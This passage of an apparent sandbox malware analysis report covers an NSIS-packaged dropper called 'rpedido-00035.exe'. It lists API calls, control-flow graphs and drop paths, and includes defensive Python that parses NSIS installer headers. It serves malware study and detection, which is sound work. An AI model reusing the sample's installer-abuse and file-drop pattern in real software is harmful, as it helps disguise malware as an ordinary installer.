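• FindClose.KERNEL32(00000000), ref: 00405C17
"""

if __name__ == "__main__":
    print(triage(MAIN_ROUTINE_LISTING), triage(DIRWALK_LISTING), sep="\n")
```

Run it directly to print the triage result for both listings. ExitWindowsEx(2, 0x80040002) decodes to EWX_REBOOT with a planned, application/installation reason, which is the combination an installer uses for a reboot-after-install, so the shutdown rule marks a capability rather than malice on its own; whether that branch actually ran is what the report's executed / not-executed colouring of the control-flow graph records, and that colouring is not part of the API listing this script reads.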
                                                          APIs
                                                            • Part of subcall function 1000121B: GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                          • GlobalAlloc.KERNELBASE(00000040,00001CA4), ref: 10001C24
                                                          • lstrcpyW.KERNEL32(00000008,?), ref: 10001C6C
                                                          • lstrcpyW.KERNEL32(00000808,?), ref: 10001C76
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001C89
                                                          • GlobalFree.KERNEL32(?), ref: 10001D83
                                                          • GlobalFree.KERNEL32(?), ref: 10001D88
                                                          • GlobalFree.KERNEL32(?), ref: 10001D8D
                                                          • GlobalFree.KERNEL32(00000000), ref: 10001F38
                                                          • lstrcpyW.KERNEL32(?,?), ref: 1000209C
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44573575588.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.44573549222.0000000010000000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.44573601928.0000000010003000.00000002.00000001.01000000.00000006.sdmp
                                                          • Associated: 00000000.00000002.44573630402.0000000010005000.00000002.00000001.01000000.00000006.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$lstrcpy$Alloc
                                                          • String ID:
                                                          • API String ID: 4227406936-0
                                                          • Opcode ID: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                          • Instruction ID: 952ca616c20dc2fa21031af5d26a5f3ec91fa4f9dea92b18a1e2b318678e368b
                                                          • Opcode Fuzzy Hash: 5a24c136153c29b9d98a91a4f463aeb2504b823c6cdae7135cdbbdb8769d9cc1
                                                          • Instruction Fuzzy Hash: 10129C75D0064AEFEB20CFA4C8806EEB7F4FB083D4F61452AE565E7198D774AA80DB50

                                                          Control-flow Graph (entry block 00405ABE; node colouring legend: Executed / Not Executed)
                                                          control_flow_graph 484 405abe-405ae4 call 405d89 487 405ae6-405af8 DeleteFileW 484->487 488 405afd-405b04 484->488 489 405c7a-405c7e 487->489 490 405b06-405b08 488->490 491 405b17-405b27 call 4063b0 488->491 493 405c28-405c2d 490->493 494 405b0e-405b11 490->494 497 405b36-405b37 call 405ccd 491->497 498 405b29-405b34 lstrcatW 491->498 493->489 496 405c2f-405c32 493->496 494->491 494->493 499 405c34-405c3a 496->499 500 405c3c-405c44 call 4066f3 496->500 501 405b3c-405b40 497->501 498->501 499->489 500->489 508 405c46-405c5a call 405c81 call 405a76 500->508 504 405b42-405b4a 501->504 505 405b4c-405b52 lstrcatW 501->505 504->505 507 405b57-405b73 lstrlenW FindFirstFileW 504->507 505->507 509 405b79-405b81 507->509 510 405c1d-405c21 507->510 526 405c72-405c75 call 405414 508->526 527 405c5c-405c5f 508->527 513 405ba1-405bb5 call 4063b0 509->513 514 405b83-405b8b 509->514 510->493 512 405c23 510->512 512->493 524 405bb7-405bbf 513->524 525 405bcc-405bd7 call 405a76 513->525 516 405c00-405c10 FindNextFileW 514->516 517 405b8d-405b95 514->517 516->509 520 405c16-405c17 FindClose 516->520 517->513 521 405b97-405b9f 517->521 520->510 521->513 521->516 524->516 529 405bc1-405bca call 405abe 524->529 537 405bf8-405bfb call 405414 525->537 538 405bd9-405bdc 525->538 526->489 527->499 528 405c61-405c70 call 405414 call 406176 527->528 528->489 529->516 537->516 540 405bf0-405bf6 538->540 541 405bde-405bee call 405414 call 406176 538->541 540->516 541->516
                                                          APIs
                                                          • DeleteFileW.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\,76B72EE0,00000000), ref: 00405AE7
                                                          • lstrcatW.KERNEL32(00425730,\*.*,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76B72EE0,00000000), ref: 00405B2F
                                                          • lstrcatW.KERNEL32(?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76B72EE0,00000000), ref: 00405B52
                                                          • lstrlenW.KERNEL32(?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76B72EE0,00000000), ref: 00405B58
                                                          • FindFirstFileW.KERNEL32(00425730,?,?,?,0040A014,?,00425730,?,?,C:\Users\user\AppData\Local\Temp\,76B72EE0,00000000), ref: 00405B68
                                                          • FindNextFileW.KERNEL32(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405C08
                                                          • FindClose.KERNEL32(00000000), ref: 00405C17
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                          • String ID: "C:\Users\user\Desktop\rpedido-00035.exe"$0WB$C:\Users\user\AppData\Local\Temp\$\*.*
                                                          • API String ID: 2035342205-137538357
                                                          • Opcode ID: 6a659da8d5721ce07b89c17eb76fa4599111a2d920b673130fc03b7c63125bad
                                                          • Instruction ID: 07f17dd178ac6d8b62b8dc139a3c49ba2dacd8a3a96bf447fe2624e5f5ce8b98
                                                          • Opcode Fuzzy Hash: 6a659da8d5721ce07b89c17eb76fa4599111a2d920b673130fc03b7c63125bad
                                                          • Instruction Fuzzy Hash: 1741D030904A18A6DB21AB618D89FBF7678EF42719F50813BF801B11D1D77C5982DEAE

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 842 406aba-406abf 843 406b30-406b4e 842->843 844 406ac1-406af0 842->844 845 407126-40713b 843->845 846 406af2-406af5 844->846 847 406af7-406afb 844->847 848 407155-40716b 845->848 849 40713d-407153 845->849 850 406b07-406b0a 846->850 851 406b03 847->851 852 406afd-406b01 847->852 855 40716e-407175 848->855 849->855 853 406b28-406b2b 850->853 854 406b0c-406b15 850->854 851->850 852->850 858 406cfd-406d1b 853->858 856 406b17 854->856 857 406b1a-406b26 854->857 859 407177-40717b 855->859 860 40719c-4071a8 855->860 862 406b90-406bbe 857->862 865 406d33-406d45 858->865 866 406d1d-406d31 858->866 863 407181-407199 859->863 864 40732a-407334 859->864 869 40693e-406947 860->869 870 406bc0-406bd8 862->870 871 406bda-406bf4 862->871 863->860 867 407340-407353 864->867 868 406d48-406d52 865->868 866->868 877 407358-40735c 867->877 872 406d54 868->872 873 406cf5-406cfb 868->873 874 407355 869->874 875 40694d 869->875 876 406bf7-406c01 870->876 871->876 878 406cd0-406cd4 872->878 879 406e65-406e72 872->879 873->858 880 406c99-406ca3 873->880 874->877 881 406954-406958 875->881 882 406a94-406ab5 875->882 883 4069f9-4069fd 875->883 884 406a69-406a6d 875->884 885 406c07 876->885 886 406b78-406b7e 876->886 897 406cda-406cf2 878->897 898 4072dc-4072e6 878->898 879->869 890 406ec1-406ed0 879->890 893 4072e8-4072f2 880->893 894 406ca9-406ccb 880->894 881->867 899 40695e-40696b 881->899 882->845 891 406a03-406a1c 883->891 892 4072a9-4072b3 883->892 888 406a73-406a87 884->888 889 4072b8-4072c2 884->889 901 4072c4-4072ce 885->901 902 406b5d-406b75 885->902 895 406c31-406c37 886->895 896 406b84-406b8a 886->896 900 406a8a-406a92 888->900 889->867 890->845 906 406a1f-406a23 891->906 892->867 893->867 894->879 903 406c95 895->903 905 406c39-406c57 895->905 896->862 896->903 897->873 898->867 899->874 904 406971-4069b7 899->904 900->882 900->884 901->867 902->886 903->880 907 4069b9-4069bd 904->907 908 4069df-4069e1 904->908 909 406c59-406c6d 905->909 910 406c6f-406c81 905->910 906->883 911 406a25-406a2b 906->911 912 4069c8-4069d6 GlobalAlloc 907->912 913 4069bf-4069c2 GlobalFree 907->913 915 4069e3-4069ed 908->915 916 4069ef-4069f7 908->916 914 406c84-406c8e 909->914 910->914 917 406a55-406a67 911->917 918 406a2d-406a34 911->918 912->874 919 4069dc 912->919 913->912 914->895 920 406c90 914->920 915->915 915->916 916->906 917->900 921 406a36-406a39 GlobalFree 918->921 922 406a3f-406a4f GlobalAlloc 918->922 919->908 924 4072d0-4072da 920->924 925 406c16-406c2e 920->925 921->922 922->874 922->917 924->867 925->895
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
                                                          • Instruction ID: 906bff5cfe4bf8fc25f5c52b70697fc94252e662920e9b50785524ea690ef068
                                                          • Opcode Fuzzy Hash: 3c070ca994c387dc491d90c6da3338e95d076c4c889754936ff9c01511acbaf1
                                                          • Instruction Fuzzy Hash: EBF17870D04229CBDF18CFA8C8946ADBBB1FF44305F15816ED856BB281D7386A86DF45
                                                          APIs
                                                          • FindFirstFileW.KERNELBASE(?,00426778,00425F30,00405DD2,00425F30,00425F30,00000000,00425F30,00425F30,?,?,76B72EE0,00405ADE,?,C:\Users\user\AppData\Local\Temp\,76B72EE0), ref: 004066FE
                                                          • FindClose.KERNELBASE(00000000), ref: 0040670A
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID: xgB
                                                          • API String ID: 2295610775-399326502
                                                          • Opcode ID: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                          • Instruction ID: 551d457f2096baf6d1028c2489454c6ec1272a262abf728b5c7319079dd029a3
                                                          • Opcode Fuzzy Hash: 8f8798618dbeb96281b7e152f222c6bef4cfc1fb78c0b92afc6d3f182eb863fd
                                                          • Instruction Fuzzy Hash: DBD012315090209BC201173CBE4C85B7A989F953397128B37B466F71E0C7348C638AE8
                                                          APIs
                                                          • ShowWindow.USER32(00000000,00000000), ref: 00401E61
                                                          • EnableWindow.USER32(00000000,00000000), ref: 00401E6C
                                                          Similarity
                                                          • API ID: Window$EnableShow
                                                          • String ID:
                                                          • API String ID: 1136574915-0
                                                          • Opcode ID: 611feb8e2eb8574bcf65ce6e82aff3c902186df27cfe016bcc5f4eefe149f0e3
                                                          • Instruction ID: 353457a250eeab47012712e359045a90ae935b3a48e85cb5936bf3a8ff6902a1
                                                          • Opcode Fuzzy Hash: 611feb8e2eb8574bcf65ce6e82aff3c902186df27cfe016bcc5f4eefe149f0e3
                                                          • Instruction Fuzzy Hash: 40E09232E08200CFD724DBA5AA4946D77B0EB84354720407FE112F11D1DA784881CF6D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 139 403abe-403ad6 call 40678a 142 403ad8-403ae8 call 4062f7 139->142 143 403aea-403b21 call 40627e 139->143 151 403b44-403b6d call 403d94 call 405d89 142->151 147 403b23-403b34 call 40627e 143->147 148 403b39-403b3f lstrcatW 143->148 147->148 148->151 157 403b73-403b78 151->157 158 403bff-403c07 call 405d89 151->158 157->158 159 403b7e-403ba6 call 40627e 157->159 163 403c15-403c3a LoadImageW 158->163 164 403c09-403c10 call 4063d2 158->164 159->158 169 403ba8-403bac 159->169 167 403cbb-403cc3 call 40140b 163->167 168 403c3c-403c6c RegisterClassW 163->168 164->163 182 403cc5-403cc8 167->182 183 403ccd-403cd8 call 403d94 167->183 172 403c72-403cb6 SystemParametersInfoW CreateWindowExW 168->172 173 403d8a 168->173 170 403bbe-403bca lstrlenW 169->170 171 403bae-403bbb call 405cae 169->171 177 403bf2-403bfa call 405c81 call 4063b0 170->177 178 403bcc-403bda lstrcmpiW 170->178 171->170 172->167 176 403d8c-403d93 173->176 177->158 178->177 181 403bdc-403be6 GetFileAttributesW 178->181 185 403be8-403bea 181->185 186 403bec-403bed call 405ccd 181->186 182->176 192 403d61-403d69 call 4054e7 183->192 193 403cde-403cf8 ShowWindow call 40671a 183->193 185->177 185->186 186->177 198 403d83-403d85 call 40140b 192->198 199 403d6b-403d71 192->199 200 403d04-403d16 GetClassInfoW 193->200 201 403cfa-403cff call 40671a 193->201 198->173 199->182 206 403d77-403d7e call 40140b 199->206 204 403d18-403d28 GetClassInfoW RegisterClassW 200->204 205 403d2e-403d5f DialogBoxParamW call 40140b call 403a0e 200->205 201->200 204->205 205->176 206->182
                                                          APIs
                                                            • Part of subcall function 0040678A: GetModuleHandleA.KERNEL32(?,00000020,?,004034FB,0000000A), ref: 0040679C
                                                            • Part of subcall function 0040678A: GetProcAddress.KERNEL32(00000000,?), ref: 004067B7
                                                          • lstrcatW.KERNEL32(1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\,76B73420,"C:\Users\user\Desktop\rpedido-00035.exe",00000000), ref: 00403B3F
                                                          • lstrlenW.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000,00000002,C:\Users\user\AppData\Local\Temp\), ref: 00403BBF
                                                          • lstrcmpiW.KERNEL32(?,.exe,Call,?,?,?,Call,00000000,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet,1033,00423728,80000001,Control Panel\Desktop\ResourceLocale,00000000,00423728,00000000), ref: 00403BD2
                                                          • GetFileAttributesW.KERNEL32(Call), ref: 00403BDD
                                                          • LoadImageW.USER32(00000067,?,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet), ref: 00403C26
                                                            • Part of subcall function 004062F7: wsprintfW.USER32 ref: 00406304
                                                          • RegisterClassW.USER32(004291E0), ref: 00403C63
                                                          • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403C7B
                                                          • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403CB0
                                                          • ShowWindow.USER32(00000005,00000000), ref: 00403CE6
                                                          • GetClassInfoW.USER32(00000000,RichEdit20W,004291E0), ref: 00403D12
                                                          • GetClassInfoW.USER32(00000000,RichEdit,004291E0), ref: 00403D1F
                                                          • RegisterClassW.USER32(004291E0), ref: 00403D28
                                                          • DialogBoxParamW.USER32(?,00000000,00403E6C,00000000), ref: 00403D47
                                                          Similarity
                                                          • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                          • String ID: "C:\Users\user\Desktop\rpedido-00035.exe"$(7B$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                          • API String ID: 1975747703-937314575
                                                          • Opcode ID: ee5fd85ec343bc094daa65e3c13ef1cff60d12f5a08356af1ceed260609d9923
                                                          • Instruction ID: afe91a4761cf59ebc4b7da6c1f2e4a45d87dcf75ce704844472433b73fc63153
                                                          • Opcode Fuzzy Hash: ee5fd85ec343bc094daa65e3c13ef1cff60d12f5a08356af1ceed260609d9923
                                                          • Instruction Fuzzy Hash: 81619370200601BED720AF669D46E2B3A7CEB84B49F40447FFD45B62E2DB7D9912862D

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 213 402f14-402f62 GetTickCount GetModuleFileNameW call 405ea2 216 402f64-402f69 213->216 217 402f6e-402f9c call 4063b0 call 405ccd call 4063b0 GetFileSize 213->217 218 4031b3-4031b7 216->218 225 402fa2-402fb9 217->225 226 40308c-40309a call 402e72 217->226 228 402fbb 225->228 229 402fbd-402fca call 40342b 225->229 233 4030a0-4030a3 226->233 234 40316b-403170 226->234 228->229 235 402fd0-402fd6 229->235 236 403127-40312f call 402e72 229->236 237 4030a5-4030bd call 403441 call 40342b 233->237 238 4030cf-40311b GlobalAlloc call 4068eb call 405ed1 CreateFileW 233->238 234->218 239 403056-40305a 235->239 240 402fd8-402ff0 call 405e5d 235->240 236->234 237->234 261 4030c3-4030c9 237->261 264 403131-403161 call 403441 call 4031ba 238->264 265 40311d-403122 238->265 244 403063-403069 239->244 245 40305c-403062 call 402e72 239->245 240->244 259 402ff2-402ff9 240->259 251 40306b-403079 call 40687d 244->251 252 40307c-403086 244->252 245->244 251->252 252->225 252->226 259->244 263 402ffb-403002 259->263 261->234 261->238 263->244 266 403004-40300b 263->266 273 403166-403169 264->273 265->218 266->244 268 40300d-403014 266->268 268->244 270 403016-403036 268->270 270->234 272 40303c-403040 270->272 275 403042-403046 272->275 276 403048-403050 272->276 273->234 274 403172-403183 273->274 277 403185 274->277 278 40318b-403190 274->278 275->226 275->276 276->244 279 403052-403054 276->279 277->278 280 403191-403197 278->280 279->244 280->280 281 403199-4031b1 call 405e5d 280->281 281->218
                                                          APIs
                                                          • GetTickCount.KERNEL32 ref: 00402F28
                                                          • GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\rpedido-00035.exe,00000400), ref: 00402F44
                                                            • Part of subcall function 00405EA2: GetFileAttributesW.KERNELBASE(00000003,00402F57,C:\Users\user\Desktop\rpedido-00035.exe,80000000,00000003), ref: 00405EA6
                                                            • Part of subcall function 00405EA2: CreateFileW.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405EC8
                                                          • GetFileSize.KERNEL32(00000000,00000000,00439000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\rpedido-00035.exe,C:\Users\user\Desktop\rpedido-00035.exe,80000000,00000003), ref: 00402F8D
                                                          • GlobalAlloc.KERNELBASE(00000040,0040A230), ref: 004030D4
                                                          Similarity
                                                          • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                          • String ID: "C:\Users\user\Desktop\rpedido-00035.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\rpedido-00035.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Inst$Installer integrity check has failed. Common causes include incomplete download and damaged media. Contact the installer's author $Null$soft
                                                          • API String ID: 2803837635-1783131074
                                                          • Opcode ID: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
                                                          • Instruction ID: 409c8f22eebac3ceeba7cf51205c68f93d68dba00e9ec32c8e3ebc1c19b8881b
                                                          • Opcode Fuzzy Hash: 4aa3185e2732ea1d92bd2938039fdcb50ab67e449d873de13479ee0b69e06266
                                                          • Instruction Fuzzy Hash: 8D61E031A00204ABDB20EF65DD85A9A7BA8EB04355F20817FF901F72D0C77C9A418BAD
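The strings attached to this function (Null, soft, Inst, "Installer integrity check has failed", "Error writing temporary file") are those of the NSIS installer stub, which opens its own image with GetModuleFileNameW/CreateFileW, takes GetFileSize, and scans for the NSIS "first header" before it unpacks anything. The Python below is an added example, not code from the report, the sample or NSIS itself, that locates and parses that header in an arbitrary file image. The header layout and flag bits are taken from the NSIS source (Source/exehead/fileform.h, struct firstheader); the image it parses is constructed by build_sample() and is not the analysed file.

```python
"""Locate and parse the NSIS "first header" inside an installer image.

Added example for this report section; it is not code from the sample,
from Joe Sandbox or from NSIS. Header layout and flag bits follow NSIS's
Source/exehead/fileform.h (struct firstheader). The image parsed by
build_sample() is constructed here, not taken from the analysed file.
"""
import struct

FH_SIG = 0xDEADBEEF                                             # firstheader.siginfo
FH_INT1, FH_INT2, FH_INT3 = 0x6C6C754E, 0x74666F73, 0x74736E49  # "Null", "soft", "Inst" as LE dwords
FH_FMT = "<IIIIIII"   # flags, siginfo, nsinst[3], length_of_header, length_of_all_following_data
FH_SIZE = struct.calcsize(FH_FMT)                               # 28 bytes
FH_FLAGS_MASK = 15
FH_FLAGS_UNINSTALL = 1
FH_FLAGS_SILENT = 2
FH_FLAGS_NO_CRC = 4
FH_FLAGS_FORCE_CRC = 8

# Byte pattern of siginfo + nsinst[3]: b"\xef\xbe\xad\xdeNullsoftInst"
NEEDLE = struct.pack("<IIII", FH_SIG, FH_INT1, FH_INT2, FH_INT3)


def find_first_header(image: bytes):
    """Return (offset, fields) of the first consistent NSIS first header, else None.

    A candidate is accepted only if its length_of_all_following_data fits
    inside the image, so a truncated download (the "integrity check" failure
    case the stub reports) yields None instead of a bogus header.
    """
    pos = image.find(NEEDLE)
    while pos != -1:
        start = pos - 4                                  # the flags dword precedes siginfo
        if start >= 0 and start + FH_SIZE <= len(image):
            flags, _sig, _n1, _n2, _n3, hdr_len, total_len = struct.unpack_from(FH_FMT, image, start)
            if FH_SIZE <= total_len <= len(image) - start:
                return start, {
                    "flags": flags & FH_FLAGS_MASK,
                    "silent": bool(flags & FH_FLAGS_SILENT),
                    "crc_disabled": bool(flags & FH_FLAGS_NO_CRC),
                    "header_len": hdr_len,               # uncompressed header size
                    "following_len": total_len,
                    # bytes past the installer data, e.g. an appended signature blob or overlay
                    "overlay_after": len(image) - (start + total_len),
                }
        pos = image.find(NEEDLE, pos + 1)
    return None


def build_sample(header_len: int = 0x40, payload: bytes = b"A" * 100,
                 flags: int = FH_FLAGS_NO_CRC) -> bytes:
    """Constructed test image: 1 KiB fake stub, first header, header bytes, data, CRC dword."""
    stub = b"MZ" + b"\x00" * 1022
    # Assumed here to span from the first header itself through the trailing CRC dword.
    following = FH_SIZE + header_len + len(payload) + 4
    fh = struct.pack(FH_FMT, flags, FH_SIG, FH_INT1, FH_INT2, FH_INT3, header_len, following)
    return stub + fh + b"H" * header_len + payload + b"\x00" * 4


if __name__ == "__main__":
    import sys
    data = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    print(find_first_header(data))
```

Running it against a real NSIS-built dropper reports where the installer data starts, whether CRC checking was disabled at build time, and how many bytes sit after the installer data, which is where an appended (here invalid) certificate would show up.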

                                                          Control-flow Graph

                                                          • Executed
                                                          • Not Executed
                                                          control_flow_graph 548 4063d2-4063dd 549 4063f0-406406 548->549 550 4063df-4063ee 548->550 551 40640c-406419 549->551 552 40661e-406624 549->552 550->549 551->552 555 40641f-406426 551->555 553 40662a-406635 552->553 554 40642b-406438 552->554 557 406640-406641 553->557 558 406637-40663b call 4063b0 553->558 554->553 556 40643e-40644a 554->556 555->552 559 406450-40648e 556->559 560 40660b 556->560 558->557 562 406494-40649f 559->562 563 4065ae-4065b2 559->563 564 406619-40661c 560->564 565 40660d-406617 560->565 566 4064a1-4064a6 562->566 567 4064b8 562->567 568 4065b4-4065ba 563->568 569 4065e5-4065e9 563->569 564->552 565->552 566->567 572 4064a8-4064ab 566->572 575 4064bf-4064c6 567->575 573 4065ca-4065d6 call 4063b0 568->573 574 4065bc-4065c8 call 4062f7 568->574 570 4065f8-406609 lstrlenW 569->570 571 4065eb-4065f3 call 4063d2 569->571 570->552 571->570 572->567 577 4064ad-4064b0 572->577 586 4065db-4065e1 573->586 574->586 579 4064c8-4064ca 575->579 580 4064cb-4064cd 575->580 577->567 582 4064b2-4064b6 577->582 579->580 584 406508-40650b 580->584 585 4064cf-4064f6 call 40627e 580->585 582->575 587 40651b-40651e 584->587 588 40650d-406519 GetSystemDirectoryW 584->588 599 406596-406599 585->599 600 4064fc-406503 call 4063d2 585->600 586->570 590 4065e3 586->590 592 406520-40652e GetWindowsDirectoryW 587->592 593 406589-40658b 587->593 591 40658d-406591 588->591 595 4065a6-4065ac call 406644 590->595 591->595 596 406593 591->596 592->593 593->591 598 406530-40653a 593->598 595->570 596->599 604 406554-40656a SHGetSpecialFolderLocation 598->604 605 40653c-40653f 598->605 599->595 602 40659b-4065a1 lstrcatW 599->602 600->591 602->595 608 406585 604->608 609 40656c-406583 SHGetPathFromIDListW CoTaskMemFree 604->609 605->604 607 406541-406548 605->607 610 406550-406552 607->610 608->593 609->591 609->608 610->591 610->604
                                                          APIs
                                                          • GetSystemDirectoryW.KERNEL32(Call,00000400), ref: 00406513
                                                          • GetWindowsDirectoryW.KERNEL32(Call,00000400,00000000,00422708,?,0040544B,00422708,00000000), ref: 00406526
                                                          • SHGetSpecialFolderLocation.SHELL32(0040544B,00000000,00000000,00422708,?,0040544B,00422708,00000000), ref: 00406562
                                                          • SHGetPathFromIDListW.SHELL32(00000000,Call), ref: 00406570
                                                          • CoTaskMemFree.OLE32(00000000), ref: 0040657B
                                                          • lstrcatW.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004065A1
                                                          • lstrlenW.KERNEL32(Call,00000000,00422708,?,0040544B,00422708,00000000), ref: 004065F9
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.44558288908.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.44558221576.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558358783.0000000000408000.00000002.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000040A000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000427000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.000000000042D000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000435000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000452000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558423844.0000000000454000.00000004.00000001.01000000.00000003.sdmp
                                                          • Associated: 00000000.00000002.44558685942.0000000000457000.00000002.00000001.01000000.00000003.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_rpedido-00035.jbxd
                                                          Similarity
                                                          • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                          • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                          • API String ID: 717251189-1230650788
                                                          • Opcode ID: 15e8cba43a00d1251787e7505a7f0100c69544ffb4eb695e889bacc90eff1716
                                                          • Instruction ID: 781aa6555cb08bc9a39a1310e2b7c8a7a94b670d8f790df7948cd7d686d0a9f3
                                                          • Opcode Fuzzy Hash: 15e8cba43a00d1251787e7505a7f0100c69544ffb4eb695e889bacc90eff1716
                                                          • Instruction Fuzzy Hash: 52611771600101ABDF209F54ED40ABE37A5AF40314F56453FE947B62D4D73D8AA2CB5D

                                                          Control-flow Graph

                                                          control_flow_graph 611 40176f-401794 call 402c37 call 405cf8 616 401796-40179c call 4063b0 611->616 617 40179e-4017b0 call 4063b0 call 405c81 lstrcatW 611->617 622 4017b5-4017b6 call 406644 616->622 617->622 626 4017bb-4017bf 622->626 627 4017c1-4017cb call 4066f3 626->627 628 4017f2-4017f5 626->628 636 4017dd-4017ef 627->636 637 4017cd-4017db CompareFileTime 627->637 630 4017f7-4017f8 call 405e7d 628->630 631 4017fd-401819 call 405ea2 628->631 630->631 638 40181b-40181e 631->638 639 40188d-4018b6 call 405414 call 4031ba 631->639 636->628 637->636 640 401820-40185e call 4063b0 * 2 call 4063d2 call 4063b0 call 405a12 638->640 641 40186f-401879 call 405414 638->641 653 4018b8-4018bc 639->653 654 4018be-4018ca SetFileTime 639->654 640->626 673 401864-401865 640->673 651 401882-401888 641->651 655 402ac8 651->655 653->654 657 4018d0-4018db CloseHandle 653->657 654->657 661 402aca-402ace 655->661 658 4018e1-4018e4 657->658 659 402abf-402ac2 657->659 662 4018e6-4018f7 call 4063d2 lstrcatW 658->662 663 4018f9-4018fc call 4063d2 658->663 659->655 669 401901-4022f6 call 405a12 662->669 663->669 669->661 673->651 675 401867-401868 673->675 675->641
                                                          APIs
                                                          • lstrcatW.KERNEL32(00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\tocsins,?,?,00000031), ref: 004017B0
                                                          • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Eddadigtet\tocsins,?,?,00000031), ref: 004017D5
                                                            • Part of subcall function 004063B0: lstrcpynW.KERNEL32(?,?,00000400,0040355A,00429240,NSIS Error,?,00000006,00000008,0000000A), ref: 004063BD
